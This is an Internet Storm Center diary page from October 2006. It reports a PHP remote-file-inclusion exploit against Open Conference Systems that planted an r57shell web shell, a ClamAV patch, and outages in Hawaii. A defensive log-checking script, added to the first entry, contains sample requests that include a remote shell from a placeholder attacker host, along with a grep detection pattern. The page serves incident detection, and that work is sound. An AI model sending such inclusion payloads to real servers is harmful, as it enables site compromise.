SANS ISC: InfoSec Handlers Diary Blog - Internet Storm Center Diary 2006-10-16 InfoSec Handlers Diary Blog



Active exploit of Open Conference Systems web application

Published: 2006-10-16
Last Updated: 2006-10-16 23:09:04 UTC
by William Salusky (Version: 1)
We're looking into a host compromise reported by Mike, a diary reader. Mike reported a PHP remote file inclusion attack against an Open Conference Systems web application used in his organization. A modified r57shell PHP script was used to compromise the system.

A vulnerability disclosure for the Open Conference System was posted to BugTraq on Friday October 13th which states that versions <= 1.1.3 are vulnerable. Interestingly enough, the official software distribution site at http://pkp.sfu.ca/ocs_download/ states that all versions prior to version 1.1.6 are vulnerable. Take a look at your respective environments to determine if you are running OCS software, and if you find it... Do I have to say it? Patch.

The time between vulnerability disclosure and determined time of host compromise in this case was approximately 1.5 hours.  I can only speculate as to how many hosts have already or are yet to become phishing sites, spammer nodes, iframe exploit hosts or fall prey to any other manner of abuse due to this vulnerability.

If you do have OCS installed, the following command line gives a quick check of your web server logs for attempted abuse:

grep "fullpath=http:" YourWebServerLogLocation.log
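The literal grep above is a fine first pass, but it is case sensitive and misses https:// or ftp:// includes and percent-encoded values. The following added example (not part of the original diary) widens the check to those variants and tallies hits per client address; the log lines, script path and addresses are constructed placeholders, not real OCS paths or indicators.

```shell
#!/bin/sh
# Constructed sample Apache combined-format access log. The script path, hostnames
# and addresses are placeholders (documentation ranges, .invalid), not real OCS paths.
LOG="$(mktemp)"
cat > "$LOG" <<'EOF'
192.0.2.10 - - [16/Oct/2006:14:02:11 +0000] "GET /ocs/index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
198.51.100.7 - - [16/Oct/2006:14:03:45 +0000] "GET /ocs/script.php?fullpath=http://attacker.invalid/r57.txt? HTTP/1.1" 200 812 "-" "libwww-perl/5.805"
198.51.100.7 - - [16/Oct/2006:14:03:52 +0000] "GET /ocs/script.php?fullpath=HTTPS%3A%2F%2Fattacker.invalid%2Fr57.txt%3F HTTP/1.1" 200 812 "-" "libwww-perl/5.805"
203.0.113.9 - - [16/Oct/2006:14:10:03 +0000] "GET /ocs/script.php?fullpath=ftp://attacker.invalid/r57.txt? HTTP/1.1" 200 812 "-" "curl/7.15"
192.0.2.10 - - [16/Oct/2006:14:11:30 +0000] "GET /ocs/script.php?fullpath=/var/www/ocs HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
EOF

# Remote-include marker: the fullpath parameter carrying a URL scheme, whether sent
# literally or percent-encoded (':' as %3a). grep -i also covers HTTP:// and %3A.
RFI_RE='fullpath=(https?|ftp)(:|%3a)'

# Number of log lines carrying a remote fullpath value.
rfi_hit_count() { grep -icE "$RFI_RE" "$1"; }

# Number of lines the diary's literal pattern would catch, for comparison.
literal_hit_count() { grep -c 'fullpath=http:' "$1"; }

# One "count ip" line per client address with hits, busiest first.
rfi_hits_by_ip() {
    grep -iE "$RFI_RE" "$1" | awk '{print $1}' | sort | uniq -c | sort -rn | awk '{print $1, $2}'
}

# Client address with the most hits (empty when there are none).
rfi_top_ip() { rfi_hits_by_ip "$1" | head -n 1 | awk '{print $2}'; }

echo "remote-include hits: $(rfi_hit_count "$LOG") (literal http: pattern: $(literal_hit_count "$LOG"))"
rfi_hits_by_ip "$LOG"
```

A hit only shows an attempt; whether the include actually succeeded still has to be confirmed on the host (response size and status, new files under the web root, outbound connections from the web server).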

Handler on Duty
William Salusky

ClamAV fixes multiple vulnerabilities

Published: 2006-10-16
Last Updated: 2006-10-16 16:54:24 UTC
by William Salusky (Version: 1)
The release of version 0.88.5 of the free and open-source ClamAV antivirus product fixes multiple vulnerabilities related to the handling of PE files and the unpacking of CHM help files. The PE handling issue poses a significant risk, and users of versions prior to ClamAV 0.88.5 are urged to upgrade ASAP.

Also of note on the ClamAV site is the availability of release candidate v0.90RC1. You may want to test this new release of ClamAV in addition to performing the security upgrade.

Handler on Duty
William Salusky

Hawaii connectivity

Published: 2006-10-16
Last Updated: 2006-10-16 01:17:32 UTC
by William Stearns (Version: 1)
After this morning's earthquake, we have reports of networks to or in Hawaii that are down, including www.hawaii.gov.  News about the incident can be found at:
http://www.thehawaiichannel.com/video/4324656/index.html ,
http://www.thehawaiichannel.com/news/index.html ,
http://www.cnn.com , and
http://the.honoluluadvertiser.com/article/2006/Oct/15/br/br9634517802.html .  We send our best wishes to the residents of Hawaii.  (Thanks to two readers for their help.)
